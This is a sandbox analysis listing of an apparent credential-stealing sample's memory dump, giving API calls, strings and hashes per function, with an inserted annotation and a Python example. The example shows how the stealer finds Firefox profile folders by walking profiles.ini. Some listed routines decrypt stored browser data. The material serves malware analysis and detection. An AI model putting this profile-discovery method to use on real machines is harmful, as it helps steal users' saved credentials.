                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                          • String ID:
                          • API String ID: 1203541146-0
                          • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                          • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                          • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                          • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@memcpymemset
                          • String ID:
                          • API String ID: 1865533344-0
                          • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                          • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                          • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                          • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 004173BE
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                          • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                          • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                          • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                          APIs
                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: NtdllProc_Window
                          • String ID:
                          • API String ID: 4255912815-0
                          • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                          • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                          • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                          • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                          APIs
                          • _wcsicmp.MSVCRT ref: 004022A6
                          • _wcsicmp.MSVCRT ref: 004022D7
                          • _wcsicmp.MSVCRT ref: 00402305
                          • _wcsicmp.MSVCRT ref: 00402333
                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                          • memset.MSVCRT ref: 0040265F
                          • memcpy.MSVCRT ref: 0040269B
                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                          • memcpy.MSVCRT ref: 004026FF
                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                          • API String ID: 2929817778-1134094380
                          • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                          • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                          • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                          • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                          • String ID: :stringdata$ftp://$http://$https://
                          • API String ID: 2787044678-1921111777
                          • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                          • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                          • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                          • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                          • GetWindowRect.USER32(?,?), ref: 00414088
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                          • GetDC.USER32 ref: 004140E3
                          • wcslen.MSVCRT ref: 00414123
                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                          • ReleaseDC.USER32(?,?), ref: 00414181
                          • _snwprintf.MSVCRT ref: 00414244
                          • SetWindowTextW.USER32(?,?), ref: 00414258
                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                          • GetClientRect.USER32(?,?), ref: 004142E1
                          • GetWindowRect.USER32(?,?), ref: 004142EB
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                          • GetClientRect.USER32(?,?), ref: 0041433B
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                          • String ID: %s:$EDIT$STATIC
                          • API String ID: 2080319088-3046471546
                          • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                          • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                          • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                          • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                          APIs
                          • EndDialog.USER32(?,?), ref: 00413221
                          • GetDlgItem.USER32(?,000003EA), ref: 00413239
                          • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                          • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                          • memset.MSVCRT ref: 00413292
                          • memset.MSVCRT ref: 004132B4
                          • memset.MSVCRT ref: 004132CD
                          • memset.MSVCRT ref: 004132E1
                          • memset.MSVCRT ref: 004132FB
                          • memset.MSVCRT ref: 00413310
                          • GetCurrentProcess.KERNEL32 ref: 00413318
                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                          • memset.MSVCRT ref: 004133C0
                          • GetCurrentProcessId.KERNEL32 ref: 004133CE
                          • memcpy.MSVCRT ref: 004133FC
                          • wcscpy.MSVCRT ref: 0041341F
                          • _snwprintf.MSVCRT ref: 0041348E
                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                          • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                          • SetFocus.USER32(00000000), ref: 004134B7
                          Strings
                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                          • {Unknown}, xrefs: 004132A6
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                          • API String ID: 4111938811-1819279800
                          • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                          • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                          • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                          • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                          APIs
                          • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                          • GetDlgItem.USER32(?,000003EE), ref: 00401238
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                          • GetDlgItem.USER32(?,000003EC), ref: 00401273
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                          • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                          • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                          • SetCursor.USER32(00000000), ref: 0040129E
                          • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                          • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                          • SetBkMode.GDI32(?,00000001), ref: 004012F2
                          • SetTextColor.GDI32(?,00C00000), ref: 00401300
                          • GetSysColorBrush.USER32(0000000F), ref: 00401308
                          • GetDlgItem.USER32(?,000003EE), ref: 00401329
                          • EndDialog.USER32(?,?), ref: 0040135E
                          • DeleteObject.GDI32(?), ref: 0040136A
                          • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                          • ShowWindow.USER32(00000000), ref: 00401398
                          • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                          • ShowWindow.USER32(00000000), ref: 004013A7
                          • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                          • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                          • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                          • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                          • String ID:
                          • API String ID: 829165378-0
                          • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                          • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                          • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                          • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                          APIs
                          • memset.MSVCRT ref: 00404172
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          • wcscpy.MSVCRT ref: 004041D6
                          • wcscpy.MSVCRT ref: 004041E7
                          • memset.MSVCRT ref: 00404200
                          • memset.MSVCRT ref: 00404215
                          • _snwprintf.MSVCRT ref: 0040422F
                          • wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 0040426E
                          • memset.MSVCRT ref: 004042CD
                          • memset.MSVCRT ref: 004042E2
                          • _snwprintf.MSVCRT ref: 004042FE
                          • wcscpy.MSVCRT ref: 00404311
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                          • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                          • API String ID: 2454223109-1580313836
                          • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                          • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
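The routine at 00404172 above carries the strings profiles.ini, General, Profile%d, IsRelative and Path, builds candidate paths with _snwprintf/wcscpy and checks each one with GetFileAttributesW (subcall 00409B98). That is the standard way a stealer locates Firefox profile folders before reading the credential store inside them: walk [Profile0], [Profile1], ... in profiles.ini and resolve each Path, treating it as relative to the Firefox directory when IsRelative=1. The block below is an added example written for this report, not code from the Joe Sandbox output or from the Remcos sample; it is in Python rather than the sample's Win32 C, the sample profiles.ini is constructed, and the function names and the assumption that the counter loop stops at the first missing ProfileN section are the author's, inferred from the Profile%d format string rather than confirmed by the listing.

```python
"""Resolve Firefox profile directories from profiles.ini the way a
credential stealer enumerates them. Added example; not from the report."""
import configparser
import os
import tempfile

# Constructed sample profiles.ini (not taken from the report or the sample):
# one relative profile, one absolute profile, one that points nowhere.
SAMPLE_PROFILES_INI = """[General]
StartWithLastProfile=1
Version=2

[Profile0]
Name=default
IsRelative=1
Path=Profiles/abcd1234.default

[Profile1]
Name=work
IsRelative=0
Path=__ABSOLUTE__

[Profile2]
Name=stale
IsRelative=1
Path=Profiles/gone.missing
"""


def enumerate_profile_entries(ini_text):
    """Walk [Profile0], [Profile1], ... until a section is missing, which is
    what a 'Profile%d' counter loop does (assumed stop condition).
    Returns (section, is_relative, path) tuples."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.optionxform = str  # keep key case so IsRelative / Path match as written
    cfg.read_string(ini_text)
    entries = []
    index = 0
    while True:
        section = "Profile%d" % index
        if not cfg.has_section(section):
            break
        is_relative = cfg.get(section, "IsRelative", fallback="1") == "1"
        path = cfg.get(section, "Path", fallback="")
        if path:
            entries.append((section, is_relative, path))
        index += 1
    return entries


def resolve_profile_dirs(ini_text, firefox_dir, is_dir=os.path.isdir):
    """Turn profiles.ini entries into directories that actually exist.
    Relative paths hang off the directory holding profiles.ini; the
    existence check plays the role of GetFileAttributesW in the listing."""
    found = []
    for _section, is_relative, path in enumerate_profile_entries(ini_text):
        full = os.path.join(firefox_dir, *path.split("/")) if is_relative else path
        if is_dir(full):
            found.append(os.path.normpath(full))
    return found


def build_demo_tree():
    """Create a throwaway Firefox-like tree so the example runs offline.
    Returns (firefox_dir, ini_text, absolute_profile_dir)."""
    root = tempfile.mkdtemp(prefix="ff_demo_")
    firefox_dir = os.path.join(root, "Firefox")
    os.makedirs(os.path.join(firefox_dir, "Profiles", "abcd1234.default"))
    absolute_profile = os.path.join(root, "work.profile")
    os.makedirs(absolute_profile)
    ini_text = SAMPLE_PROFILES_INI.replace("__ABSOLUTE__", absolute_profile)
    with open(os.path.join(firefox_dir, "profiles.ini"), "w") as fh:
        fh.write(ini_text)
    return firefox_dir, ini_text, absolute_profile


if __name__ == "__main__":
    ff_dir, ini, _ = build_demo_tree()
    for profile_dir in resolve_profile_dirs(ini, ff_dir):
        print(profile_dir)
```

For detection purposes the useful observation is the access pattern rather than the parser: a non-browser process (here the injected host at 0x400000) opening profiles.ini and then probing each ProfileN path is a file-access sequence that can be hunted for independently of the Remcos strings themselves.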
                          APIs
                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                          • SetMenu.USER32(?,00000000), ref: 00411453
                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                          • memcpy.MSVCRT ref: 004115C8
                          • ShowWindow.USER32(?,?), ref: 004115FE
                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                          • API String ID: 4054529287-3175352466
                          • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                          • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscat$_snwprintfmemset$wcscpy
                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                          • API String ID: 3143752011-1996832678
                          • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                          • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                          • GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                          • GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                          • GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                          • GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                          • GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                          • API String ID: 667068680-2887671607
                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintfmemset$wcscpy$wcscat
                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                          • API String ID: 1607361635-601624466
                          • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                          • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _snwprintf$memset$wcscpy
                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                          • API String ID: 2000436516-3842416460
                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                          APIs
                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                          • String ID:
                          • API String ID: 1043902810-0
                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                          APIs
                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                          • memset.MSVCRT ref: 0040E380
                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
